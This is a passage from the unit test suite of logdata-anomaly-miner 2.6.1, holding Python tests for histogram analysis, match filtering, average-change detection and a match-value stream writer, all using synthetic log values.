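        self.assertEqual(event_type_detector.num_event_lines, event_type_detector_loaded.num_event_lines)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/HistogramAnalysisTest.py000066400000000000000000000471731437606560100304760ustar00rootroot00000000000000
import unittest
from aminer.analysis.HistogramAnalysis import (LinearNumericBinDefinition, ModuloTimeBinDefinition, HistogramData, HistogramAnalysis,
                                               PathDependentHistogramAnalysis)
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
import time
from datetime import datetime
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase


class HistogramAnalysisTest(TestBase):
    """Unittests for the HistogramAnalysis module: bin definitions, HistogramData and the two analysis components."""

    # Report layouts checked against the captured output of the stream printer event handler.
    # Arguments: report time, component class name, description, line count, report start, report end, histogram text.
    __expected_string_histogram_analysis = '%s Histogram report\n%s: "%s" (%d lines)\n Histogram report from %s till %s\n %s\n\n'
    __expected_string_path_dependent_histogram_analysis = ('%s Histogram report\n%s: "%s" (%d lines)\n Path histogram report from %s '
                                                           'till %s\n%s\n\n')

    match_crontab = 'match/crontab'
    datetime_format_string = '%Y-%m-%d %H:%M:%S'

    def test1linear_numeric_bin_definition_get_bin_names(self):
        """Check the bin names produced by LinearNumericBinDefinition.get_bin_names for bin sizes 1 and 2."""
        linear_numeric_bin_definition = LinearNumericBinDefinition(0, 1, 10, True)
        self.assertEqual(linear_numeric_bin_definition.get_bin_names(), [
            '...-0]', '[0-1]', '[1-2]', '[2-3]', '[3-4]', '[4-5]', '[5-6]', '[6-7]', '[7-8]', '[8-9]', '[9-10]', '[10-...'])

        linear_numeric_bin_definition = LinearNumericBinDefinition(0, 2, 10, True)
        self.assertEqual(linear_numeric_bin_definition.get_bin_names(), [
            '...-0]', '[0-2]', '[2-4]', '[4-6]', '[6-8]', '[8-10]', '[10-12]', '[12-14]', '[14-16]', '[16-18]', '[18-20]', '[20-...'])

    def test2linear_numeric_bin_definition_get_bin(self):
        """Check LinearNumericBinDefinition.get_bin for the value 2 with different lower bounds and bin sizes."""
        for lower_limit, bin_size, expected_bin in ((0, 1, 3), (1, 1, 2), (2, 1, 1), (0, 4, 1)):
            linear_numeric_bin_definition = LinearNumericBinDefinition(lower_limit, bin_size, 10, True)
            self.assertEqual(linear_numeric_bin_definition.get_bin(2), expected_bin)

    def test3linear_numeric_bin_definition_get_bin_p_values(self):
        """Check that LinearNumericBinDefinition.get_bin_p_value returns a value (it relies on scipy)."""
        linear_numeric_bin_definition = LinearNumericBinDefinition(0, 1, 10, True)
        self.assertIsNotNone(linear_numeric_bin_definition.get_bin_p_value(2, 10, [2, 2]),
                             'Probably the scipy module could not be loaded. Please check your installation.')

    def test4_modulo_time_bin_definition_get_bin(self):
        """Check ModuloTimeBinDefinition.get_bin with hourly bins over a day (seconds since midnight)."""
        modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False)
        self.assertEqual(modulo_time_bin_definition.get_bin(57599), 15)
        self.assertEqual(modulo_time_bin_definition.get_bin(57600), 16)
        self.assertEqual(modulo_time_bin_definition.get_bin(61199), 16)
        self.assertEqual(modulo_time_bin_definition.get_bin(61200), 17)

    def test5_histogram_data_add_value(self):
        """Check that HistogramData.add_value increments the right bin and the element counters."""
        modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False)
        histogram_data = HistogramData("crontab", modulo_time_bin_definition)
        histogram_data.add_value(57600)
        self.assertEqual(histogram_data.bin_data[16], 1)
        self.assertEqual(histogram_data.total_elements, 1)
        self.assertEqual(histogram_data.binned_elements, 0)

        histogram_data.add_value(61200)
        self.assertEqual(histogram_data.bin_data[16], 1)
        self.assertEqual(histogram_data.bin_data[17], 1)
        self.assertEqual(histogram_data.total_elements, 2)
        self.assertEqual(histogram_data.binned_elements, 0)

        histogram_data.add_value(61500)
        self.assertEqual(histogram_data.bin_data[16], 1)
        self.assertEqual(histogram_data.bin_data[17], 2)
        self.assertEqual(histogram_data.total_elements, 3)
        self.assertEqual(histogram_data.binned_elements, 0)

        histogram_data.add_value(100000)
        # 100000%86400 = 13600 -> 3
        self.assertEqual(histogram_data.bin_data[3], 1)
        self.assertEqual(histogram_data.bin_data[16], 1)
        self.assertEqual(histogram_data.bin_data[17], 2)
        self.assertEqual(histogram_data.total_elements, 4)
        self.assertEqual(histogram_data.binned_elements, 0)

    def test6_histogram_data_reset(self):
        """Check that HistogramData.reset clears all bins and both counters."""
        modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False)
        histogram_data = HistogramData("crontab", modulo_time_bin_definition)
        histogram_data.add_value(57600)
        histogram_data.add_value(61200)
        histogram_data.reset()
        self.assertEqual(histogram_data.total_elements, 0)
        self.assertEqual(histogram_data.binned_elements, 0)
        for item in histogram_data.bin_data:
            self.assertEqual(item, 0)

    def test7_histogram_data_clone(self):
        """Check that HistogramData.clone copies the bins and that the clone is independent of the original."""
        modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False)
        histogram_data = HistogramData("crontab", modulo_time_bin_definition)
        histogram_data.add_value(57600)
        histogram_data.add_value(61200)
        clone = histogram_data.clone()
        self.assertEqual(clone.bin_data[16], 1)
        self.assertEqual(clone.bin_data[17], 1)
        self.assertEqual(clone.total_elements, 2)
        self.assertEqual(clone.binned_elements, 0)
        clone.add_value(1)
        # Adding to the clone must not touch the original.
        self.assertEqual(clone.bin_data[0], 1)
        self.assertEqual(histogram_data.bin_data[0], 0)

    def test8_histogram_data_to_string(self):
        """Check the text rendering of HistogramData.to_string on a clone with three elements."""
        modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False)
        histogram_data = HistogramData("crontab", modulo_time_bin_definition)
        histogram_data.add_value(57600)
        histogram_data.add_value(61200)
        clone = histogram_data.clone()
        self.assertEqual(clone.bin_data[16], 1)
        self.assertEqual(clone.bin_data[17], 1)
        self.assertEqual(clone.total_elements, 2)
        self.assertEqual(clone.binned_elements, 0)
        clone.add_value(1)
        self.assertEqual(clone.bin_data[0], 1)
        self.assertEqual(histogram_data.bin_data[0], 0)
        self.assertEqual(clone.to_string(''), 'Property "crontab" (3 elements):\n* [0-1]: 1 (ratio = 3.33e-01, p = 1.20e-01)\n* [16-17]: '
                                              '1 (ratio = 3.33e-01, p = 1.20e-01)\n* [17-18]: 1 (ratio = 3.33e-01, p = 1.20e-01)')

    def test9HistogramAnalysisReceiveAtomNoReport(self):
        """
        Feed atoms to HistogramAnalysis whose timestamps stay within the report interval (604800 s).

        No report is expected, so the captured output must stay empty in both rounds.
        """
        description = "Test9HistogramAnalysis"
        start_time = 57600
        end_time = 662600
        diff = 30000
        modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False)
        histogram_data = HistogramData(self.match_crontab, modulo_time_bin_definition)
        histogram_analysis = HistogramAnalysis(self.aminer_config, [(histogram_data.property_path, modulo_time_bin_definition)], 604800,
                                               [self.stream_printer_event_handler], True, 'Default')
        self.analysis_context.register_component(histogram_analysis, description)
        match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None)

        t = time.time()
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, histogram_analysis)
        histogram_analysis.receive_atom(log_atom)
        histogram_data.add_value(start_time)
        histogram_data.add_value(end_time)
        match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, histogram_analysis)
        histogram_analysis.receive_atom(log_atom)
        self.assertEqual(self.output_stream.getvalue(), '')

        # resetting the outputStream
        start_time = start_time + 3600
        end_time = end_time + 3600
        self.reset_output_stream()

        t = t + diff
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, histogram_analysis)
        histogram_analysis.receive_atom(log_atom)
        histogram_data.add_value(start_time)
        histogram_data.add_value(end_time)
        match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, histogram_analysis)
        histogram_analysis.receive_atom(log_atom)
        self.assertEqual(self.output_stream.getvalue(), '')

    def test10_histogram_analysis_receive_atom_report_expected(self):
        """
        Feed atoms to HistogramAnalysis with a time gap (605000 s) larger than the report interval (604800 s).

        A report is expected in both rounds; its exact text is checked against the captured output.
        """
        description = "Test10HistogramAnalysis"
        start_time = 57600
        end_time = 662600
        diff = 605000
        modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False)
        histogram_data = HistogramData(self.match_crontab, modulo_time_bin_definition)
        histogram_analysis = HistogramAnalysis(self.aminer_config, [(histogram_data.property_path, modulo_time_bin_definition)], 604800,
                                               [self.stream_printer_event_handler], True, 'Default')
        self.analysis_context.register_component(histogram_analysis, description)
        match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None)

        t = time.time()
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, histogram_analysis)
        histogram_analysis.receive_atom(log_atom)
        histogram_data.add_value(start_time)
        histogram_data.add_value(end_time)
        match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, histogram_analysis)
        histogram_analysis.receive_atom(log_atom)
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string_histogram_analysis % (
            datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), histogram_analysis.__class__.__name__, description, 2,
            datetime.fromtimestamp(t).strftime(self.datetime_format_string),
            datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string),
            'Property "match/crontab" (2 elements):\n * [16-17]: 2 (ratio = 1.00e+00, p = 1.74e-03)'))

        # resetting the outputStream
        start_time = start_time + 3600
        end_time = end_time + 3600
        self.reset_output_stream()

        t = t + diff
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, histogram_analysis)
        histogram_analysis.receive_atom(log_atom)
        histogram_data.add_value(start_time)
        histogram_data.add_value(end_time)
        match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, histogram_analysis)
        histogram_analysis.receive_atom(log_atom)
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string_histogram_analysis % (
            datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), histogram_analysis.__class__.__name__, description, 2,
            datetime.fromtimestamp(t).strftime(self.datetime_format_string),
            datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string),
            'Property "match/crontab" (2 elements):\n * [16-17]: 1 (ratio = 5.00e-01, p = 8.16e-02)\n * [17-18]: 1 '
            '(ratio = 5.00e-01, p = 8.16e-02)'))

    def test11_path_dependent_histogram_analysis_no_report(self):
        """
        Feed atoms to PathDependentHistogramAnalysis.receive_atom with timestamps inside the report interval.

        No report is expected, so the captured output must stay empty in both rounds.
        """
        description = "Test11HistogramAnalysis"
        start_time = 57600
        end_time = 662600
        diff = 30000
        modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False)
        histogram_data = HistogramData(self.match_crontab, modulo_time_bin_definition)
        path_dependent_histogram_analysis = PathDependentHistogramAnalysis(
            self.aminer_config, histogram_data.property_path, modulo_time_bin_definition, 604800, [self.stream_printer_event_handler], True,
            'Default')
        self.analysis_context.register_component(path_dependent_histogram_analysis, description)
        match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None)

        t = time.time()
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        histogram_data.add_value(start_time)
        histogram_data.add_value(end_time)
        match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        self.assertEqual(self.output_stream.getvalue(), '')

        # resetting the outputStream
        start_time = start_time + 3600
        end_time = end_time + 3600
        self.reset_output_stream()

        # Second round: every value is delivered twice.
        t = t + diff
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        histogram_data.add_value(start_time)
        histogram_data.add_value(end_time)
        histogram_data.add_value(start_time)
        histogram_data.add_value(end_time)
        match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        self.assertEqual(self.output_stream.getvalue(), '')

    def test12_path_dependent_histogram_analysis_report_expected(self):
        """
        Feed atoms to PathDependentHistogramAnalysis.receive_atom with a time gap larger than the report interval.

        A report is expected in both rounds; its exact text is checked against the captured output.
        """
        description = "Test12HistogramAnalysis"
        start_time = 57600
        end_time = 662600
        diff = 605000
        modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False)
        histogram_data = HistogramData(self.match_crontab, modulo_time_bin_definition)
        path_dependent_histogram_analysis = PathDependentHistogramAnalysis(
            self.aminer_config, histogram_data.property_path, modulo_time_bin_definition, 604800, [self.stream_printer_event_handler], True,
            'Default')
        self.analysis_context.register_component(path_dependent_histogram_analysis, description)
        match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None)

        t = time.time()
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        histogram_data.add_value(start_time)
        histogram_data.add_value(end_time)
        match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string_path_dependent_histogram_analysis % (
            datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), path_dependent_histogram_analysis.__class__.__name__,
            description, 2, datetime.fromtimestamp(t).strftime(self.datetime_format_string),
            datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string),
            'Path values "match/crontab":\nExample: 662600\n Property "match/crontab" (2 elements):\n * [16-17]: 2 '
            '(ratio = 1.00e+00, p = 1.74e-03)'))

        # resetting the outputStream (inline here; the other tests call self.reset_output_stream())
        start_time = start_time + 3600
        end_time = end_time + 3600
        self.output_stream.seek(0)
        self.output_stream.truncate(0)

        # Second round: every value is delivered twice.
        t = t + diff
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        match_element = MatchElement(self.match_crontab, str(start_time).encode(), start_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        histogram_data.add_value(start_time)
        histogram_data.add_value(end_time)
        histogram_data.add_value(start_time)
        histogram_data.add_value(end_time)
        match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        match_element = MatchElement(self.match_crontab, str(end_time).encode(), end_time, None)
        log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + diff, path_dependent_histogram_analysis)
        path_dependent_histogram_analysis.receive_atom(log_atom)
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string_path_dependent_histogram_analysis % (
            datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string), path_dependent_histogram_analysis.__class__.__name__,
            description, 3, datetime.fromtimestamp(t).strftime(self.datetime_format_string),
            datetime.fromtimestamp(t + diff).strftime(self.datetime_format_string),
            'Path values "match/crontab":\nExample: 666200\n Property "match/crontab" (3 elements):\n * [16-17]: 1 '
            '(ratio = 3.33e-01, p = 1.20e-01)\n * [17-18]: 2 (ratio = 6.67e-01, p = 5.06e-03)'))


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/MatchFilterTest.py000066400000000000000000000110101437606560100272160ustar00rootroot00000000000000
import unittest import time from unit.TestBase import TestBase from aminer.analysis.MatchFilter import MatchFilter from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.input.LogAtom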
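import LogAtom
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.ParserMatch import ParserMatch
from datetime import datetime


class MatchFilterTest(TestBase):
    """Unittests for the MatchFilter.

    Every test parses the integers 0..999 with a DecimalIntegerValueModelElement named 'integer' and feeds
    them to a MatchFilter; after each atom the captured output stream is compared against __expected_string
    (or against the empty string when no event is expected).
    """

    __expected_string = '%s Log Atom Filtered\nMatchFilter: "%s" (1 lines)\n %d\n\n'

    def _new_filter(self, description, target_path_list, **kwargs):
        """Create a MatchFilter for `target_path_list`, register it under `description` and return it.

        `kwargs` are forwarded unchanged (the tests use target_value_list).
        """
        match_filter = MatchFilter(self.aminer_config, target_path_list, [self.stream_printer_event_handler], **kwargs)
        self.analysis_context.register_component(match_filter, description)
        return match_filter

    @staticmethod
    def _atom_for(model_element, val, timestamp, match_filter):
        """Encode `val`, parse it with `model_element` at the root path '' and wrap it in a LogAtom for `match_filter`."""
        val_str = str(val).encode('utf-8')
        parser_match = ParserMatch(model_element.get_match_element('', MatchContext(val_str)))
        return LogAtom(val_str, parser_match, timestamp, match_filter)

    def _expected_event(self, timestamp, description, val):
        """Render the event text expected on the output stream for a filtered atom carrying `val`."""
        return self.__expected_string % (datetime.fromtimestamp(timestamp).strftime("%Y-%m-%d %H:%M:%S"), description, val)

    def test1_receive_atom_trigger_event(self):
        """An event must be triggered for every atom whose path is in the target_path_list."""
        description = "Test1MatchFilterTest"
        decimal_integer_me = DecimalIntegerValueModelElement('integer')
        match_filter = self._new_filter(description, ['/integer'])
        t = time.time()
        for val in range(1000):
            match_filter.receive_atom(self._atom_for(decimal_integer_me, val, t, match_filter))
            self.assertEqual(self._expected_event(t, description, val), self.output_stream.getvalue())
            self.reset_output_stream()

    def test2_receive_atom_trigger_no_event(self):
        """No event may be triggered when the atom's path is not in the target_path_list."""
        description = "Test2MatchFilterTest"
        decimal_integer_me = DecimalIntegerValueModelElement('integer')
        match_filter = self._new_filter(description, ['/strings'])
        t = time.time()
        for val in range(1000):
            match_filter.receive_atom(self._atom_for(decimal_integer_me, val, t, match_filter))
        self.assertEqual('', self.output_stream.getvalue())

    def test3_receive_atom_with_target_value(self):
        """An event is triggered when the path is in the target_path_list and the value is in the target_value_list."""
        description = "Test3MatchFilterTest"
        decimal_integer_me = DecimalIntegerValueModelElement('integer')
        match_filter = self._new_filter(description, ['/integer'], target_value_list=list(range(1001)))
        t = time.time()
        for val in range(1000):
            match_filter.receive_atom(self._atom_for(decimal_integer_me, val, t, match_filter))
            self.assertEqual(self._expected_event(t, description, val), self.output_stream.getvalue())
            self.reset_output_stream()

    def test4_receive_atom_with_no_target_value(self):
        """Only values inside the target_value_list (0..500) may trigger an event; 501..999 must stay silent."""
        description = "Test4MatchFilterTest"
        decimal_integer_me = DecimalIntegerValueModelElement('integer')
        match_filter = self._new_filter(description, ['/integer'], target_value_list=list(range(501)))
        t = time.time()
        for val in range(1000):
            match_filter.receive_atom(self._atom_for(decimal_integer_me, val, t, match_filter))
            if val <= 500:
                self.assertEqual(self._expected_event(t, description, val), self.output_stream.getvalue())
            else:
                self.assertEqual('', self.output_stream.getvalue())
            self.reset_output_stream()


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/MatchValueAverageChangeDetectorTest.py000066400000000000000000000361011437606560100331460ustar00rootroot00000000000000import unittest from aminer.analysis.MatchValueAverageChangeDetector import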
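MatchValueAverageChangeDetector
from aminer.parsing.MatchElement import MatchElement
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase
from datetime import datetime
import time


class MatchValueAverageChangeDetectorTest(TestBase):
    """Unittests for the MatchValueAverageChangeDetector.

    Each test pushes a first batch of timestamps into the detector (the "old bin") and then a second batch whose
    values are compared against it; afterwards the output stream is checked for a "Statistical data report".
    The value used for a match element doubles as its match string, its match object and the atom timestamp.
    """

    __expected_string = '%s Statistical data report\n%s: "%s" (%d lines)\n "cron/job1": Change: new: n = 3, avg = %s, ' \
        'var = 100000000.0; old: n = 3, avg = %s, var = 1000000.0\n\n'
    __expected_string2 = '%s Statistical data report\n%s: "%s" (%d lines)\n "cron/job1": Change: new: n = 2, avg = %s, ' \
        'var = 50000000.0; old: n = 2, avg = %s, var = 500000.0\n "cron/job2": Change: new: n = 2, avg = %s, ' \
        'var = 60500000.0; old: n = 2, avg = %s, var = 500000.0\n\n'
    cron_job1 = 'cron/job1'
    cron_job2 = 'cron/job2'

    def _new_detector(self, description, timestamp_path, paths, min_bin_elements, min_bin_time):
        """Create a detector with the positional arguments the tests vary and register it under `description`.

        The parameter names describe how the tests use the positions (None or 'time' for the third argument,
        a bin size of 2 or 3, a start timestamp); confirm against the detector's own signature before relying on them.
        """
        detector = MatchValueAverageChangeDetector(
            self.aminer_config, [self.stream_printer_event_handler], timestamp_path, paths, min_bin_elements,
            min_bin_time, False, 'Default')
        self.analysis_context.register_component(detector, description)
        return detector

    @staticmethod
    def _send(detector, path, value):
        """Build a MatchElement at `path` carrying `value` and hand it to `detector` as a LogAtom stamped `value`."""
        match_element = MatchElement(path, b"%d" % value, value, None)
        log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), value, detector)
        detector.receive_atom(log_atom)

    def _send_all(self, detector, path, start_time, offsets):
        """Send one atom per offset, each at start_time + offset."""
        for offset in offsets:
            self._send(detector, path, start_time + offset)

    def test1receive_atom_min_bin_elements_not_reached(self):
        """No statistical evaluation is performed until the minimal amount of bin elements is reached."""
        description = "Test1MatchValueAverageChangeDetector"
        start_time = 57600
        match_element1 = MatchElement(self.cron_job1, b"%d" % start_time, start_time, None)
        detector = self._new_detector(description, None, [match_element1.get_path()], 3, start_time)
        # create oldBin
        self._send_all(detector, self.cron_job1, start_time, (0, 1000, 2000))
        # compare Data: only two values, which must not produce a report
        self._send_all(detector, self.cron_job1, start_time, (10000, 20000))
        self.assertEqual(self.output_stream.getvalue(), '')

    def test2receive_atom_min_bin_time_not_reached(self):
        """No statistical evaluation is performed until the start time (here one day ahead) is reached."""
        description = "Test2MatchValueAverageChangeDetector"
        start_time = 57600
        match_element1 = MatchElement(self.cron_job1, b"%d" % start_time, start_time, None)
        detector = self._new_detector(description, 'time', [match_element1.get_path()], 3, start_time + 86400)
        # create oldBin
        self._send_all(detector, self.cron_job1, start_time, (0, 1000, 2000))
        # compare Data
        self._send_all(detector, self.cron_job1, start_time, (10000, 20000, 30000))
        self.assertEqual(self.output_stream.getvalue(), '')

    def test3receive_atom_statistically_ok(self):
        """Values that stay within the statistically acceptable area must not produce a report."""
        description = "Test3MatchValueAverageChangeDetector"
        start_time = 57600
        match_element1 = MatchElement(self.cron_job1, b"%d" % start_time, start_time, None)
        detector = self._new_detector(description, 'time', [match_element1.get_path()], 3, start_time)
        # create oldBin
        self._send_all(detector, self.cron_job1, start_time, (0, 1000, 2000))
        # compare Data: same spacing as the old bin, shifted by 11000
        self._send_all(detector, self.cron_job1, start_time, (11000, 12000, 13000))
        self.assertEqual(self.output_stream.getvalue(), '')

    def test4receiveAtomStatisticallyOutOfRange(self):
        """Values far outside the statistically acceptable area must produce a report for cron/job1."""
        description = "Test4MatchValueAverageChangeDetector"
        start_time = time.time()
        match_element1 = MatchElement(self.cron_job1, b"%d" % start_time, start_time, None)
        detector = self._new_detector(description, None, [match_element1.get_path()], 3, start_time)
        # create oldBin
        self._send_all(detector, self.cron_job1, start_time, (0, 1000, 2000))
        # compare Data: spacing of 10000 instead of 1000
        self._send_all(detector, self.cron_job1, start_time, (10000, 20000, 30000))
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(start_time + 30000).strftime("%Y-%m-%d %H:%M:%S"), detector.__class__.__name__,
            description, 6, start_time + 20000, start_time + 1000))

    def test5more_values(self):
        """With two watched paths, the report is only emitted once both paths have a comparison bin."""
        description = "Test5MatchValueAverageChangeDetector"
        start_time = time.time()
        match_element1 = MatchElement(self.cron_job1, b"%d" % start_time, start_time, None)
        match_element2 = MatchElement(self.cron_job2, b"%d" % start_time, start_time, None)
        detector = self._new_detector(
            description, None, [match_element1.get_path(), match_element2.get_path()], 2, start_time)
        # create oldBin
        self._send_all(detector, self.cron_job1, start_time, (0, 1000))
        # create oldBin for ME2
        self._send_all(detector, self.cron_job2, start_time, (0, 1000))
        # compare data
        self._send_all(detector, self.cron_job1, start_time, (10000, 20000))
        self.assertEqual(self.output_stream.getvalue(), '')
        # compare data with ME2
        self._send_all(detector, self.cron_job2, start_time, (11000, 22000))
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string2 % (
            datetime.fromtimestamp(start_time + 22000).strftime("%Y-%m-%d %H:%M:%S"), detector.__class__.__name__,
            description, 4, start_time + 15000, start_time + 500, start_time + 16500, start_time + 500))


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/MatchValueStreamWriterTest.py000066400000000000000000000225351437606560100314300ustar00rootroot00000000000000import unittest from _io import BytesIO from aminer.parsing.MatchContext import MatchContext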
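from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter
from aminer.parsing.ParserMatch import ParserMatch
from aminer.input.LogAtom import LogAtom
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from unit.TestBase import TestBase


class MatchValueStreamWriterTest(TestBase):
    """Unittests for the MatchValueStreamWriter.

    The input is four records of the form "<integer>Euro " parsed by a SequenceModelElement ('sequence') made of
    a DecimalIntegerValueModelElement ('d1') and a FixedDataModelElement ('s1'). The writer is configured with the
    paths match/sequence/d1 and match/sequence/s1, a separator and a missing-value string, and writes one line per
    atom into a BytesIO that the tests decode and compare.
    """

    euro = b'Euro '
    match_sequence_s1 = 'match/sequence/s1'
    match_sequence_d1 = 'match/sequence/d1'

    def _setup(self, description, data, separator, missing_value_string):
        """Build the parser chain and a registered writer for `data`.

        Returns (output_stream, match_context, decimal_integer_value_me, sequence_model_element, writer).
        """
        output_stream = BytesIO()
        match_context = MatchContext(data)
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            'd1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        fixed_dme = FixedDataModelElement('s1', self.euro)
        sequence_model_element = SequenceModelElement('sequence', [decimal_integer_value_me, fixed_dme])
        writer = MatchValueStreamWriter(
            output_stream, [self.match_sequence_d1, self.match_sequence_s1], separator, missing_value_string)
        self.analysis_context.register_component(writer, description)
        return output_stream, match_context, decimal_integer_value_me, sequence_model_element, writer

    @staticmethod
    def _write(writer, match_context, model_element, path=None):
        """Parse the next record from `match_context` with `model_element` and pass it to `writer` as a LogAtom.

        `path`, when given, overrides the match element's path; the tests use it to present a bare 'd1' match
        under the sequence's d1 path so that the s1 path is missing from the atom.
        """
        match_element = model_element.get_match_element('match', match_context)
        if path is not None:
            match_element.path = path
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, writer)
        writer.receive_atom(log_atom)

    def test1all_atoms_match(self):
        """All four records match the sequence; the two values of each are joined by ';'."""
        output_stream, match_context, _, sequence_model_element, writer = self._setup(
            "Test1MatchValueStreamWriter", b'25537Euro 25538Euro 25539Euro 25540Euro ', b';', b'-')
        for _ in range(4):
            self._write(writer, match_context, sequence_model_element)
        self.assertEqual(output_stream.getvalue().decode(), '25537;Euro \n25538;Euro \n25539;Euro \n25540;Euro \n')

    def test2all_atoms_match_no_seperator(self):
        """All four records match; with an empty separator the two values of each record are concatenated."""
        output_stream, match_context, _, sequence_model_element, writer = self._setup(
            "Test2MatchValueStreamWriter", b'25537Euro 25538Euro 25539Euro 25540Euro ', b'', b'-')
        for _ in range(4):
            self._write(writer, match_context, sequence_model_element)
        self.assertEqual(output_stream.getvalue().decode(), '25537Euro \n25538Euro \n25539Euro \n25540Euro \n')

    def test3atom_no_match_missing_value_string_empty(self):
        """The last record lacks the s1 value; with an empty missing-value string nothing is written in its place."""
        output_stream, match_context, decimal_integer_value_me, sequence_model_element, writer = self._setup(
            "Test3MatchValueStreamWriter", b'25537Euro 25538Euro 25539Euro 25540Pfund ', b';', b'')
        for _ in range(3):
            self._write(writer, match_context, sequence_model_element)
        self._write(writer, match_context, decimal_integer_value_me, self.match_sequence_d1)
        self.assertEqual(output_stream.getvalue().decode(), '25537;Euro \n25538;Euro \n25539;Euro \n25540;\n')

    def test4atom_no_match_missing_value_string_set(self):
        """The last record lacks the s1 value; the configured missing-value string '-' is written in its place."""
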